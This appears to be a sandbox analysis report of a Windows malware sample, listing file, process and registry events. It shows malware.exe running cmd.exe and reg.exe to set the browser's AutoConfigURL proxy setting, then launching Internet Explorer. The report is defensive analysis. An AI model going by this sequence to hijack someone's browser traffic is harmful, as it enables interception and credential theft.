11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.762Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Temp\~DF214669B9A01F6D69.TMP~DF214669B9A01F6D69.TMP
11/3/2020 - 11:46:1.762Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat{5E9C5275-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:46:1.762Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\url.dll
11/3/2020 - 11:46:1.762Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\Desktop\url.dll
11/3/2020 - 11:46:1.762Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\url.dll
11/3/2020 - 11:46:1.762Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:1.762Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ieframe.dll
11/3/2020 - 11:46:55.856Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\pt-BR.1

Process
Trace
11/3/2020 - 11:45:42.918Create1480C:\malware.exe1488C:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:43.356Create1488C:\Windows\SysWOW64\cmd.exe2828C:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.528Terminate1488C:\Windows\SysWOW64\cmd.exe2828C:\Windows\SysWOW64\reg.exe
11/3/2020 - 11:45:43.856Create1488C:\Windows\SysWOW64\cmd.exe1928C:\Program Files\Internet Explorer\iexplore.exe
11/3/2020 - 11:45:44.12Terminate1480C:\malware.exe1488C:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:45.981Create1928C:\Program Files\Internet Explorer\iexplore.exe2488C:\Program Files (x86)\Internet Explorer\iexplore.exe

Analysis
Reason
Timeout

Status
Sucessfully Executed

Results
1

Registry
Trace
11/3/2020 - 11:45:42.809Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
11/3/2020 - 11:45:42.809Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
11/3/2020 - 11:45:42.809Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
11/3/2020 - 11:45:42.809Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
11/3/2020 - 11:45:42.809Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
11/3/2020 - 11:45:42.809Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
11/3/2020 - 11:45:42.809Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
11/3/2020 - 11:45:42.809Write1480C:\malware.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
11/3/2020 - 11:45:43.528Write2828C:\Windows\SysWOW64\reg.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoConfigURL
11/3/2020 - 11:45:43.840Write1488C:\Windows\SysWOW64\cmd.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached{17FE9752-0B5A-4665-84CD-569794602F5C} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF
11/3/2020 - 11:45:45.434Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
11/3/2020 - 11:45:45.434Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
11/3/2020 - 11:45:45.434Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
11/3/2020 - 11:45:45.434Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
11/3/2020 - 11:45:45.465Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ContentCachePrefix
11/3/2020 - 11:45:45.465Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\CookiesCachePrefix
11/3/2020 - 11:45:45.465Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\HistoryCachePrefix
11/3/2020 - 11:45:45.528Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\MainCompatibilityFlags
11/3/2020 - 11:45:45.606Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnable
11/3/2020 - 11:45:45.606Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyServer
11/3/2020 - 11:45:45.606Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyOverride
11/3/2020 - 11:45:45.606Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoConfigURL
11/3/2020 - 11:45:45.606Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoDetect
11/3/2020 - 11:45:45.606Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsSavedLegacySettings
11/3/2020 - 11:45:45.606Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\Recovery\AdminActive{5426E1A8-4F1B-11E8-8B8A-525400842A13}
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
11/3/2020 - 11:45:45.793Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecuritySafe
11/3/2020 - 11:45:45.809Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\MainFullScreen
11/3/2020 - 11:45:45.872Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\MainWindow_Placement
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\Main\WindowsSearchUpgradeTime
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\Main\WindowsSearchUpgradeTime
11/3/2020 - 11:45:45.965Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Internet Explorer\Recovery\PendingRecoveryAdminActive
11/3/2020 - 11:45:46.918Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ContentCachePrefix
11/3/2020 - 11:45:46.918Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\CookiesCachePrefix
11/3/2020 - 11:45:46.918Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\HistoryCachePrefix
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapProxyBypass
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapIntranetName
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapUNCAsIntranet
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapAutoDetect
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnable
11/3/2020 - 11:45:46.997Delete2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyServer
11/3/2020 - 11:45:46.997Delete2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsProxyOverride
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoConfigURL
11/3/2020 - 11:45:46.997Delete2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet SettingsAutoDetect
11/3/2020 - 11:45:46.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsSavedLegacySettings
11/3/2020 - 11:45:47.278Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
11/3/2020 - 11:45:47.278Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
11/3/2020 - 11:45:47.278Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
11/3/2020 - 11:45:47.278Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
11/3/2020 - 11:45:47.590Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
11/3/2020 - 11:45:47.590Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
11/3/2020 - 11:45:47.590Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
11/3/2020 - 11:45:47.590Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionReason
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionTime
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecision
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadNetworkName
11/3/2020 - 11:45:47.778Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDetectedUrl
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
11/3/2020 - 11:45:47.778Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
11/3/2020 - 11:45:47.778Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
11/3/2020 - 11:45:47.778Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionReason
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecisionTime
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDecision
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadNetworkName
11/3/2020 - 11:45:47.840Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60}WpadDetectedUrl
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
11/3/2020 - 11:45:47.840Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionReason
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecisionTime
11/3/2020 - 11:45:47.840Write1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDecision
11/3/2020 - 11:45:47.872Delete1928C:\Program Files\Internet Explorer\iexplore.exeHKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3WpadDetectedUrl
11/3/2020 - 11:45:48.418Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
11/3/2020 - 11:45:48.418Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
11/3/2020 - 11:45:48.418Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
11/3/2020 - 11:45:48.418Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
11/3/2020 - 11:45:48.418Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeHKCU\Local Settings\MuiCache\5\96383CDBLanguageList
11/3/2020 - 11:45:48.418Delete2488C:\Program Files (x86)\Internet Explorer\iexplore.exe\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates75E0ABB6138512271C04F85FDDDE38E4B7242EFE
11/3/2020 - 11:45:48.418Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exe\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\75E0ABB6138512271C04F85FDDDE38E4B7242EFEBlob
